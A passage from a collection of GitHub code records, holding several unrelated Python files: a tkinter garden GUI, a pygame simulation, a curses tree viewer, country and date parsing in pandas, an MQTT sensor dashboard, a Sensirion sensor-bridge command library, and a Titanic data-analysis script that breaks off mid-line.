height=dimensions.lbar_nav[3])\r\n frame_lbar_nav_l_1.pack(side=tk.TOP, fill=tk.BOTH, expand=True); frame_lbar_nav_r_1.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_l_2.pack(fill=tk.BOTH, expand=True); frame_lbar_nav_r_2.pack(fill=tk.BOTH, expand=True)\r\n frame_lbar_nav_l_3.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True); frame_lbar_nav_r_3.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)\r\n \r\n #Place Widgets within Frames & Define Buttons\r\n canvas = tk.Canvas(frame_rbar, width = dimensions.cnv[2], height = dimensions.cnv[3], bg='#d0e0e3'); canvas.pack(fill=tk.BOTH)\r\n MyGarden = Garden(dimensions, canvas)\r\n\r\n title = tk.Label(frame_lbar_ttl, text=\"***SEED***\", font=(\"bold\", 20)); title.pack()\r\n logo = tk.Label(frame_lbar_logo, text=\"***LOGO***\", font=(\"bold\", 20)); logo.pack()\r\n \r\n userinput_genes = tk.Entry(frame_lbar_gene, width=50); userinput_genes.pack(padx=10, pady=10, side = tk.LEFT, fill=tk.X)\r\n submit_button = tk.Button(frame_lbar_gene, text = \"Submit\"); submit_button.pack(pady=10, side = tk.RIGHT)\r\n \r\n plant_button = tk.Button(frame_lbar_nav_l_1, text = \"ALL NEW\",\r\n command = MyGarden.grow_FullGarden); plant_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n weed_button = tk.Button(frame_lbar_nav_l_2, text = \"[REMOVE]\"); weed_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n mix_button = tk.Button(frame_lbar_nav_l_3, text = \"[BREED]\"); mix_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n self_button = tk.Button(frame_lbar_nav_r_1, text = \"[SELF]\"); self_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n save_button = tk.Button(frame_lbar_nav_r_2, text = \"[SAVE]\"); save_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n till_button = tk.Button(frame_lbar_nav_r_3, text = \"CLEAR ALL\",\r\n command = MyGarden.grow_EmptyGarden); till_button.pack(fill=tk.BOTH, expand=True, padx=5, pady=5)\r\n\r\n #Create Plots and Grow Initial Plants from Scratch\r\n MyGarden.grow_FullGarden() \r\n root.mainloop()\r\n\r\n\r\n","repo_name":"MalachitesTower/FlowerGarden","sub_path":"tkfowers3.py","file_name":"tkfowers3.py","file_ext":"py","file_size_in_byte":23685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27811028847","text":"import random\n\n\nclass Atom():\n def __init__(self, name, speed):\n self.x = random.choice(range(50, 550))\n self.y = random.choice(range(50, 350))\n self.height = 10\n self.width = 10\n self.speed = speed\n self.color = (0,255,50)\n self.sight = 450\n self.count = 0\n self.name = name\n\n\n #поедание\n def eat(self, food_lst):\n for food in food_lst:\n if food.x in range(self.x-9, self.x+9) and food.y in range(self.y-9, self.y+9):\n food.x = random.choice(range(5, 550))\n food.y = random.choice(range(5, 350))\n self.count += 1\n print(self.name, 'Съедено:', self.count)\n\n\n def move(self):\n move_up = random.choice(range(4))\n move_down = random.choice(range(4))\n move_left = random.choice(range(4))\n move_right = random.choice(range(4))\n\n move_list = [move_up, move_down, move_left, move_right]\n\n for i in move_list:\n if move_list[0] == 3 and self.y > 10:\n self.y -= self.speed\n break\n if move_list[1] == 3 and self.y < 390:\n self.y += self.speed\n break\n if move_list[2] == 3 and self.x > 10:\n self.x -= self.speed\n break\n if move_list[3] == 3 and self.x < 590:\n self.x += self.speed\n break\n else:\n pass\n\n\n def hunt(self, food_lst):\n for food in food_lst:\n if food.x in range(self.x-self.sight, self.x+self.sight) and food.y in range(self.y-self.sight, self.y+self.sight):\n if self.x > food.x:\n self.x -= self.speed\n if self.x < food.x:\n self.x += self.speed\n if self.y > food.y:\n self.y -= self.speed\n if self.y < food.y:\n self.y += self.speed\n","repo_name":"tihon49/PyGame","sub_path":"bacterium/src/atom.py","file_name":"atom.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37242620761","text":"import curses\nimport time\nfrom functools import partial\n\nfrom vert_tree.base import BaseTreeDisplay, TreeDisplayError\nfrom vert_tree.common import Edge\n\n\nclass CursesDisplay(BaseTreeDisplay):\n def __init__(self, timeout=-1):\n self.timeout = timeout\n self.x = self.y = 0\n self.function = partial(curses.wrapper, self._display_curses_tree)\n\n def _init_display(self, tree):\n self.height = tree.vertical_length\n self.width = tree.total_width\n self.root_pos = tree.left_width\n try:\n self.pad = curses.newpad(self.height, self.width)\n self.pad.keypad(True)\n curses.curs_set(0)\n except:\n raise TreeDisplayError(\n \"The curses lib cannot handle a tree so large! Height: {} width: {}\".format(self.height, self.width)\n )\n # curses reads will block for only this time amount in millis\n self.pad.timeout(500)\n\n def _display_curses_tree(self, stdscr, root, edge_spacing):\n super(CursesDisplay, self)._base_display_tree(root, edge_spacing)\n _, win_width = stdscr.getmaxyx()\n # center pad on root element\n if win_width < self.width:\n self.x = self.root_pos - int(win_width / 2)\n time_end = self._get_end_time()\n while time.time() < time_end:\n win_height, win_width = stdscr.getmaxyx()\n self.pad.refresh(self.y, self.x, 0, 0, win_height - 1, win_width - 1)\n input_char = self._get_pad_char()\n if input_char == ord(\"q\"):\n break\n elif input_char == curses.KEY_UP:\n self.y = max(self.y - 1, 0)\n elif input_char == curses.KEY_DOWN:\n self.y = min(self.y + 1, self.height - win_height)\n elif input_char == curses.KEY_RIGHT:\n self.x = min(self.x + 1, self.width - 2)\n elif input_char == curses.KEY_LEFT:\n self.x = max(self.x - 1, 0)\n\n def _get_pad_char(self):\n # used for simpler monkey patching in test\n return self.pad.getch()\n\n def _get_end_time(self):\n if self.timeout >= 0:\n return time.time() + self.timeout\n return float(\"inf\")\n\n def _print_edges(self, level_edges, level, width, edge_spacing, lines_required):\n if not level_edges:\n return\n for edge in level_edges:\n curr_level = 0\n curr_pos = edge.parent_pos\n if edge.direction == \"/\":\n while curr_level < lines_required:\n curr_pos -= edge.get_step_width(edge_spacing, curr_pos - edge.child_pos)\n y = edge.distance_from_top + curr_level\n self.pad.addch(y, curr_pos, edge.direction)\n curr_level += 1\n else:\n while curr_level < lines_required:\n curr_pos += edge.get_step_width(edge_spacing, edge.child_pos - curr_pos)\n y = edge.distance_from_top + curr_level\n self.pad.addch(y, curr_pos, edge.direction)\n curr_level += 1\n\n def _print_vertices(self, level_verts, width):\n self._truncate_node_vals(level_verts)\n for vertex in level_verts:\n self.pad.addstr(vertex.distance_from_top, vertex.start, vertex.node.val)\n","repo_name":"kepplemr/vert_tree","sub_path":"vert_tree/curses_display.py","file_name":"curses_display.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38328751386","text":"import pandas as pd\nimport numpy as np\nimport re\nimport ast\nimport logging as log\n\npd.set_option('display.max_rows', None)\npd.set_option('display.max_columns', None)\npd.set_option('display.width', 1000)\npd.set_option('display.max_colwidth', 100)\npd.options.mode.use_inf_as_na = True\n\nlog.basicConfig(filename=\"debug.log\")\n\ndef findCountry(loc, co):\n for countryVar in co:\n countryRegex = re.compile(countryVar, re.IGNORECASE)\n if countryRegex.search(str(loc), re.IGNORECASE):\n LOC_Resolve_Country = co[0]\n LOC_Resolve_Ostalo = loc.replace(countryVar, '')\n LOC_Resolve_Ostalo = re.sub('^[^a-zA-ZčćžšđČĆŽŠĐ]*|[^a-zA-ZčćžšđČĆŽŠĐ]*$','', LOC_Resolve_Ostalo)\n break\n else:\n LOC_Resolve_Country = \"NEMA\"\n pass\n if LOC_Resolve_Country == \"NEMA\":\n return False\n else:\n return LOC_Resolve_Country, LOC_Resolve_Ostalo\n\ndef findCity(loc, ci):\n LOC_Resolve_City = False\n for cityVar in ci:\n \n# log.warning(cityVar + \"===\" + loc)\n \n cityRegex = re.compile(cityVar, re.IGNORECASE)\n if cityRegex.search(str(loc)):\n LOC_Resolve_City = ci[0]\n break\n else:\n pass\n return LOC_Resolve_City\n\ndef findDate(data):\n # 12. - 14.9.1997\n dateRegex_1 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n # 1997\n dateRegex_2 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n # 2.1997.\n dateRegex_3 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n # 30.11. - 1.12.1997\n dateRegex_4 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n # 1.2.1997.\n dateRegex_5 = re.compile(\n r'^'\n r'[\\s.-]*'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.-]+'\n r'(\\d+)'\n r'[\\s.,]*'\n r'$'\n )\n date_1 = dateRegex_1.match(data)\n date_2 = dateRegex_2.match(data)\n date_3 = dateRegex_3.match(data)\n date_4 = dateRegex_4.match(data)\n date_5 = dateRegex_5.match(data)\n if date_1:\n dateFixed = (''\n + 'OD '\n + date_1.group(1).rjust(2, '0') + '.' + date_1.group(3).rjust(2, '0') + '.'+ date_1.group(4) + '.'\n + ' DO '\n + date_1.group(2).rjust(2, '0') + '.' + date_1.group(3).rjust(2, '0') + '.'+ date_1.group(4) + '.'\n )\n elif date_4:\n dateFixed = (''\n + 'OD '\n + date_4.group(1).rjust(2, '0') + '.' + date_4.group(2).rjust(2, '0') + '.'+ date_4.group(5) + '.'\n + ' DO '\n + date_4.group(3).rjust(2, '0') + '.' + date_4.group(4).rjust(2, '0') + '.'+ date_4.group(5) + '.'\n )\n elif date_5:\n dateFixed = (''\n + 'OD '\n + date_5.group(1).rjust(2, '0') + '.' + date_5.group(2).rjust(2, '0') + '.'+ date_5.group(3) + '.'\n + ' DO '\n + date_5.group(1).rjust(2, '0') + '.' + date_5.group(2).rjust(2, '0') + '.'+ date_5.group(3) + '.'\n )\n elif date_3:\n dateFixed = (''\n + 'OD '\n + date_3.group(1).rjust(2, '0') + '.' + date_3.group(2) + '.'\n + ' DO '\n + date_3.group(1).rjust(2, '0') + '.' + date_3.group(2) + '.'\n )\n elif date_2:\n dateFixed = (''\n + 'OD '\n + date_2.group(1).rjust(4, '0') + '.'\n + 'DO '\n + date_2.group(1).rjust(4, '0') + '.'\n )\n else:\n dateFixed = \"??.??.????.\"\n return dateFixed\n\ndef fixAll(data, co, ci):\n LOC_Resolve_Country = ''\n LOC_Resolve_Ostalo = ''\n LOC_Resolve_City = ''\n DAT_Resolve = ''\n \n for idx, row in co.iterrows():\n country = row['COUNTRY'].split(',')\n findResult = findCountry(data[\"LOC\"], country)\n if findResult == False:\n pass\n else:\n LOC_Resolve_Country = findResult[0]\n LOC_Resolve_Ostalo = findResult[1]\n break\n \n # for idx2, row2 in ci.iterrows():\n # city = row2['combined'].split(', ')\n # findCiResult = findCity(data[\"LOC\"], city)\n # if findCiResult:\n # LOC_Resolve_City = findCiResult\n # break\n \n if str(data[\"DAT\"]) !='nan':\n date = findDate(data[\"DAT\"])\n else:\n date = \"NONE\"\n DAT_Resolve = date\n ret = pd.Series([DAT_Resolve, LOC_Resolve_Country, LOC_Resolve_Ostalo])\n return ret\n\n\nci = pd.read_csv(\"DATA/cities1000.txt\", nrows=1000000, sep=r\"\\t\", engine='python')\nci['combined'] = ci.iloc[:, 1:4].apply(lambda row: str(','.join( row.values.astype(str)).split(\",\", 7)[:7]), axis=1).filter(ci.iloc[:,7]==\"HR\")\n\nci['combined'].to_csv(\"/tmp/citiesHR.csv\", sep=\"|\", quotechar=\"~\")\n\n# Import Skup list\ndf = pd.read_csv(\"DATA/skup.csv\", nrows=1000000, quotechar='~', sep=\",\")\n\n# Import Country list\nco = pd.read_csv(\"DATA/countries.txt\", nrows=1000000, quotechar='\"', sep=\"~\")\n\n# Import City list\n#ci = pd.read_csv(\"DATA/cities.csv\", nrows=1000, quotechar='\"', sep=\"~\")\n\n#f = open(\"DATA/cities.csv\", \"r\")\n\ndf[[\"DAT_Resolve\", \"LOC_Resolve_Country\", \"LOC_Resolve_Ostalo\"]] = df.apply(lambda x: fixAll(x, co, ci), axis=1)\n\ndf.to_csv(\"/tmp/bla.csv\", sep=\"|\", quotechar=\"~\")\n","repo_name":"Rudjer-Boskovic-Institute/Skupovi_FIX","sub_path":"parse_country.py","file_name":"parse_country.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11902912160","text":"#!/usr/bin/env python3\n\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n\"\"\"JSON\n\"\"\"\n\n# imports: library\nfrom typing import Any, Generator\n\n\ndef indent(steps: int = 0, size: int = 2) -> str:\n \"\"\"Indent\"\"\"\n\n return ' ' * size * steps\n\n\ndef formatter(unit: Any, indent_steps: int = 0) -> Generator:\n \"\"\"Formatter\"\"\"\n\n if isinstance(unit, list):\n for index, item in enumerate(unit):\n\n if not isinstance(item, list) and not isinstance(item, dict):\n yield f'{indent(indent_steps)}[{index}] \\'{item}\\''\n else:\n yield f'{indent(indent_steps)}[{index}]'\n for subunit in formatter(item, indent_steps + 1):\n yield subunit\n\n elif isinstance(unit, dict):\n for key, value in unit.items():\n start = f'{indent(indent_steps)}\\'{key}\\':'\n\n if not isinstance(value, list) and not isinstance(value, dict):\n yield f'{start} \\'{value}\\''\n else:\n yield start\n for item in formatter(value, indent_steps + 1):\n yield item\n\n else:\n yield str(unit)\n","repo_name":"sunarch/libmonty","sub_path":"src/libmonty/formatting/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29178215902","text":"import time\nimport datetime as dt\nfrom tkinter import *\nimport paho.mqtt.client as mqtt\nimport os\nimport csv\n# Main Tkinter application\nclass Application(Frame):\t\n\t\n\t# Create display elements\n def createWidgets(self):\n self.cur_time = Label(self, textvariable=self.time, font=('Verdana', 20, 'bold'))\n self.time.set(\"Time\")\n self.cur_time.pack() # organize in block\n\t\n self.temperature1 = Label(self, textvariable=self.temp_data1, font=('Verdana', 20, 'bold'))\n self.temp_data1.set(\"Temperature SHTC3\")\n self.temperature1.pack() # organize in block\n\t\t\n self.humidity1 = Label(self, textvariable=self.hum_data1, font=('Verdana', 20, 'bold'))\n self.hum_data1.set(\"Humidity SHTC3\")\n self.humidity1.pack()\n\t\t\n self.temperature2 = Label(self, textvariable=self.temp_data2, font=('Verdana', 20, 'bold'))\n self.temp_data2.set(\"Temperature TMP117\")\n self.temperature2.pack()\n\t\t\n self.temperature_alarm = Label(self, textvariable=self.temp_data_alarm, fg = 'red', font=('Verdana', 20, 'bold'))\n self.temp_data_alarm.set(\"Temperature Alarm\")\n self.temperature_alarm.pack() # organize in block\n\t\t\n self.humidity_alarm = Label(self, textvariable=self.humid_data_alarm, fg = 'red', font=('Verdana', 20, 'bold'))\n self.humid_data_alarm.set(\"Humidity Alarm\")\n self.humidity_alarm.pack() # organize in block\n\t\t\n # Init the variables & start measurements\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.time = StringVar() # used for widget text edit\n self.temp_data_alarm = StringVar()\n self.humid_data_alarm = StringVar()\n self.temp_data1 = StringVar()\n self.hum_data1 = StringVar()\n self.temp_data2 = StringVar()\n self.createWidgets()\n self.pack()\n self.timer()\n\t\t\n # show current time\t\n def timer(self):\n self.time.set(str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n self.cur_time.pack()\n # update time every second\n self.after(1000, self.timer)\n\t\t\n # update data received from MQTT broker\t\n def receiveData_t1(self, t_data):\n self.temp_data1.set(\"Temperature SHTC3 : \" + t_data+ \" oC\")\n self.temperature1.pack()\n def receiveData_h1(self, h_data):\n self.hum_data1.set(\"Humidity SHTC3 : \" + h_data+ \" %\")\n self.humidity1.pack()\t\n def receiveData_t2(self, t_data):\n self.temp_data2.set(\"Temperature TMP117: \" + t_data + \" oC\")\n self.temperature2.pack()\t\n def receiveData_a_t(self, t_data):\n self.temp_data_alarm.set(t_data)\n self.temperature_alarm.pack()\n def receiveData_a_h(self, h_data):\n self.humid_data_alarm.set(h_data)\n self.humidity_alarm.pack()\n\t\t\n # write to csv file\n def write_csv_data(self, filename, data, time_data):\n with open(filename, mode = 'a') as f:\n f_writer = csv.writer(f, delimiter = ',')\n f_writer.writerow([data, time_data])\n\n def write_csv_header(self, filename, header1, header2):\n with open(filename, mode = 'a') as f:\n f_writer = csv.writer(f, delimiter = ',')\n f_writer.writerow([header1, header2])\n#########################################################################\n# MAIN \n# receive temperature and humidity from sensors through MQTT in real time\n##########################################################################\napp = Application()\n\ncsv_filename_t_alarm = \"temperature_alarm.csv\"\ncsv_filename_t_tmp117 = \"temperature_TMP117.csv\"\ncsv_filename_t_shtc3 = \"temperature_SHTC3.csv\"\ncsv_filename_h_shtc3 = \"humidity_SHTC3.csv\"\nheader1 = 'temperature'\nheader2 = 'humidity'\nheader3 = 'time'\n\n# prepare header for csv file for temperature TMP117\nif not(os.path.isfile(csv_filename_t_tmp117)):\n app.write_csv_header(csv_filename_t_tmp117, header1, header3)\n# prepare header for csv file for temperature SHTC3\nif not(os.path.isfile(csv_filename_t_shtc3)):\n app.write_csv_header(csv_filename_t_shtc3, header1, header3)\n# prepare header for csv file for himidity SHTC3\t\nif not(os.path.isfile(csv_filename_h_shtc3)):\n app.write_csv_header(csv_filename_h_shtc3, header2, header3)\t\n\t\n# receive data from MQTT broker and update these values\ndef messageFunction_t1 (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_t1(message)\n app.write_csv_data(csv_filename_t_shtc3, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_t1 = mqtt.Client(\"Client_SHTC3_t\") \nclient_t1.connect(\"test.mosquitto.org\", 1883) \nclient_t1.subscribe(\"NhanIOT/test/t_data_SHTC3/\") \nclient_t1.on_message = messageFunction_t1 # Attach the messageFunction to subscription\nclient_t1.loop_start() # Start the MQTT client\n\n# receive data from MQTT broker and update these values\ndef messageFunction_h1 (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_h1(message)\n app.write_csv_data(csv_filename_h_shtc3, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_h1 = mqtt.Client(\"Client_SHTC3_h\") \nclient_h1.connect(\"test.mosquitto.org\", 1883) \nclient_h1.subscribe(\"NhanIOT/test/h_data_SHTC3/\") \nclient_h1.on_message = messageFunction_h1 # Attach the messageFunction to subscription\nclient_h1.loop_start() # Start the MQTT client\n\n# receive data from MQTT broker and update these values\ndef messageFunction_t2 (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_t2(message)\n app.write_csv_data(csv_filename_t_tmp117, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_t2 = mqtt.Client(\"Client_TMP117\") \nclient_t2.connect(\"test.mosquitto.org\", 1883) \nclient_t2.subscribe(\"NhanIOT/test/t_data_TMP117/\") \nclient_t2.on_message = messageFunction_t2 # Attach the messageFunction to subscription\nclient_t2.loop_start() # Start the MQTT client\n\n# receive data from MQTT broker and update these values\ndef messageFunction_a_t (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_a_t(message)\n #app.write_csv_data(csv_filename_t_alarm, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_a_t = mqtt.Client(\"Client_alarm_t\") \nclient_a_t.connect(\"test.mosquitto.org\", 1883) \nclient_a_t.subscribe(\"NhanIOT/test/alarm_t/\") \nclient_a_t.on_message = messageFunction_a_t # Attach the messageFunction to subscription\nclient_a_t.loop_start() # Start the MQTT client\n\n# receive data from MQTT broker and update these values\ndef messageFunction_a_h (client, userdata, message):\n topic = str(message.topic)\n message = str(message.payload.decode(\"utf-8\"))\n app.receiveData_a_h(message)\n #app.write_csv_data(csv_filename_t_alarm, message, str(dt.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n\t\nclient_a_h = mqtt.Client(\"Client_alarm_h\") \nclient_a_h.connect(\"test.mosquitto.org\", 1883) \nclient_a_h.subscribe(\"NhanIOT/test/alarm_h/\") \nclient_a_h.on_message = messageFunction_a_h # Attach the messageFunction to subscription\nclient_a_h.loop_start() # Start the MQTT client\n\napp.mainloop()","repo_name":"tlcnhan/THSensor","sub_path":"sensor_gui.py","file_name":"sensor_gui.py","file_ext":"py","file_size_in_byte":7305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37664445039","text":"from __future__ import absolute_import, division, print_function\nfrom sensirion_shdlc_driver.command import ShdlcCommand\nfrom struct import pack, unpack\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass SensorBridgeCmdDeviceInformationBase(ShdlcCommand):\n \"\"\"\n SHDLC command 0xD0: \"Device Information\".\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(SensorBridgeCmdDeviceInformationBase, self).__init__(\n 0xD0, *args, **kwargs)\n\n\nclass SensorBridgeCmdGetProductType(SensorBridgeCmdDeviceInformationBase):\n\n def __init__(self):\n \"\"\"\n Get Product Type Command\n\n Gets the product type from the device.\n \"\"\"\n super(SensorBridgeCmdGetProductType, self).__init__(\n data=b\"\".join([bytes(bytearray([0x00]))]),\n max_response_time=0.005,\n post_processing_time=0.0,\n min_response_length=0,\n max_response_length=255\n )\n\n @staticmethod\n def interpret_response(data):\n \"\"\"\n :return: String containing the product type.\n :rtype: str\n \"\"\"\n prod_type = str(data[0:].decode('utf-8').rstrip('\\0')) # string\n return prod_type\n\n\nclass SensorBridgeCmdGetProductName(SensorBridgeCmdDeviceInformationBase):\n\n def __init__(self):\n \"\"\"\n Get Product Name Command\n\n Gets the product name from the device.\n \"\"\"\n super(SensorBridgeCmdGetProductName, self).__init__(\n data=b\"\".join([bytes(bytearray([0x01]))]),\n max_response_time=0.005,\n post_processing_time=0.0,\n min_response_length=0,\n max_response_length=255\n )\n\n @staticmethod\n def interpret_response(data):\n \"\"\"\n :return: String containing the product name.\n :rtype: str\n \"\"\"\n prod_name = str(data[0:].decode('utf-8').rstrip('\\0')) # string\n return prod_name\n\n\nclass SensorBridgeCmdGetArticleCode(SensorBridgeCmdDeviceInformationBase):\n\n def __init__(self):\n \"\"\"\n Get Article Code Command\n\n Gets the article code from the device.\n \"\"\"\n super(SensorBridgeCmdGetArticleCode, self).__init__(\n data=b\"\".join([bytes(bytearray([0x02]))]),\n max_response_time=0.005,\n post_processing_time=0.0,\n min_response_length=0,\n max_response_length=255\n )\n\n @staticmethod\n def interpret_response(data):\n \"\"\"\n :return: String containing the article code.\n :rtype: str\n \"\"\"\n article_code = str(data[0:].decode('utf-8').rstrip('\\0')) # string\n return article_code\n\n\nclass SensorBridgeCmdGetSerialNumber(SensorBridgeCmdDeviceInformationBase):\n\n def __init__(self):\n \"\"\"\n Get Serial Number Command\n\n Gets the serial number from the device.\n \"\"\"\n super(SensorBridgeCmdGetSerialNumber, self).__init__(\n data=b\"\".join([bytes(bytearray([0x03]))]),\n max_response_time=0.005,\n post_processing_time=0.0,\n min_response_length=0,\n max_response_length=255\n )\n\n @staticmethod\n def interpret_response(data):\n \"\"\"\n :return: String containing the serial number.\n :rtype: str\n \"\"\"\n serial_no = str(data[0:].decode('utf-8').rstrip('\\0')) # string\n return serial_no\n","repo_name":"Sensirion/python-shdlc-sensorbridge","sub_path":"sensirion_shdlc_sensorbridge/commands/device_information.py","file_name":"device_information.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7392823187","text":"import os\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, OrdinalEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, mean_absolute_percentage_error, \\\n explained_variance_score\n\nfrom functions.functions import *\nfrom functions.feature_eng import *\nfrom functions.plots import *\n\nPLOT = False # Mark plot is 'True' for updating the plots in folder figures\nSEED = 1 # Random seed for model training\nTRAIN = True # Mark train is 'True' for training a model based on training data, mark 'False' for loading a pickle file\nSAVE = True # Mark save is 'True' for pickling the trained model with a timestamp, mark 'False for not saving the model\n\n# Loading data as pandas dataframe:\ndf_train = pd.read_csv('sourceData/train.csv') # Survival provided\ndf_test = pd.read_csv('sourceData/test.csv') # Survival not provided, to predict\ndf_titanic = pd.read_csv('sourceData/titanic.csv') # Full dataset for checking prediction accuracy\ndf_output = df_test[['PassengerId', 'Name']]\n\ndata = [df_train, df_test]\n\n\"\"\"\nA. Exploratory Data Analysis:\n\"\"\"\n\n# A.1 Data overview:\ndf_train.describe()\ndf_train.info()\n\ndf_train.drop(labels='PassengerId', axis=1, inplace=True)\ndf_test.drop(labels='PassengerId', axis=1, inplace=True)\n# Conclusions:\n# - 'PassengerId' is a mere row identifier which is dropped from the analysis\n\n# A.2 Missing values\nnull_count_by_column(df_train) # Print features for which values are null\nnull_count_by_column(df_test)\n\n# Conclusions:\n# - For 'Cabin' the majority of data points are missing, hence imputing data would probably not add value\n# - For 'Age' and 'Fare' missing datapoints may be imputed\n# - For 'Embarked' only 2 values are missing which will be dropped\n\ndf_train.dropna(subset=['Embarked'], inplace=True) # Embarked contains only 2 rows with missing values\ndf_test.dropna(subset=['Embarked'], inplace=True)\n\ndf_train = imp_age(df_train) # Impute median age based on Sex/Pclass groups\ndf_test = imp_age(df_test)\n\ndf_train = imp_fare(df_train) # Impute mean fare based on Pclass groups\ndf_test = imp_fare(df_test)\n\n# A.3 Target Distribution\nsurv = sum(df_train['Survived'])\nsurv_women = df_train.loc[df_train.Sex == 'female'][\"Survived\"]\nsurv_men = df_train.loc[df_train.Sex == 'male'][\"Survived\"]\n\nprint(f'{surv} from the {len(df_train)} training observations survived the Titanic, indicating a survival rate of '\n f'{surv / len(df_train):.2%}')\n\n# Conclusions:\n# - The minority of persons in the training set survived the Titanic\n\n# A.4 Feature Target Distribution\nprint(df_train.dtypes)\n\n# A.4.1 Continuous Features\ncol_cont = df_train.select_dtypes(include='float64')\n\nfor col in col_cont:\n q = pd.qcut(df_train[col], 10)\n print(df_train.pivot_table('Survived', index=q))\n\n# Conclusions:\n# - The Distribution of Age indicates that children (<16) have a higher survival rate\n# - The Distribution of Fare indicates that a higher Fare (10.5+) indicates a higher survival rate\n\n# A.4.2 Categorical Features\ncol_cat = df_train.select_dtypes(exclude='float64')\n\nprint(f'{surv} from the {len(df_train)} training observations survived the Titanic, from which {sum(surv_women)}'\n f' are female ({sum(surv_women) / surv:.2%}), and {sum(surv_men)} are male ({sum(surv_men) / surv:.2%})')\nprint(\n f'From the total number of woman {sum(surv_women) / len(surv_women):.2%} survived, and from the total number of men'\n f' {sum(surv_men) / len(surv_men):.2%} survived the Titanic')\n\npivot_cat(df_train, col_cat) # print the survival rate per categorical feature category\n\n# Conclusions:\n# - Female passengers have a higher survival rate than male\n# - Passengers embarked from Cherbourg (C) have the highest survival rate\n# - Passengers travelling with Parents or Children have a higher survival rate\n# - Passengers travelling class 1 or 2 have a higher survival rate than passengers travelling class 3\n# - Passengers travelling with a Sibling or Spouse have a higher survival rate\n\n# A.5 Correlation\nprint(f'Correlation Matrix: \\n {df_train.corr().round(2)}')\n\n# Conclusions:\n# - Feature correlation indicates relationships which may be used for creating new features\n# - Spikes in a distribution (f.i. 'Age') may be captured via a decision tree model\n# - Ordinal relations (f.i. 'Pclass) may be captured via a linear model\n\n# A.6 EDA Plots\nif PLOT:\n plot_hist(df_train, col_cont) # Plot A.4.1 Continuous Features\n plot_count(df_train, col_cat) # Plot A.4.2 Categorical Features\n plot_corr(df_train) # Plot A.5 Correlation\n\n\"\"\"\nB. Feature Engineering:\n\"\"\"\n\n# B.1. New features\n\n# B.1.1 Creating new features from arithmetics\ndf_train['Family_Size'] = 1 + df_train['SibSp'] + df_train['Parch']\ndf_test['Family_Size'] = 1 + df_test['SibSp'] + df_test['Parch']\n\ndf_train['Cabin_n'] = df_train.Cabin.apply(lambda x: 0 if pd.isna(x) else len(x.split(' '))) # Count Cabins, 0 is NaN\ndf_test['Cabin_n'] = df_test.Cabin.apply(lambda x: 0 if pd.isna(x) else len(x.split(' ')))\n\ndf_train['Cabin_section'] = df_train.Cabin.apply(lambda x: str(x)[0]) # Retrieve section, first Cabin character\ndf_test['Cabin_section'] = df_test.Cabin.apply(lambda x: str(x)[0])\n\ndf_train['Name_title'] = 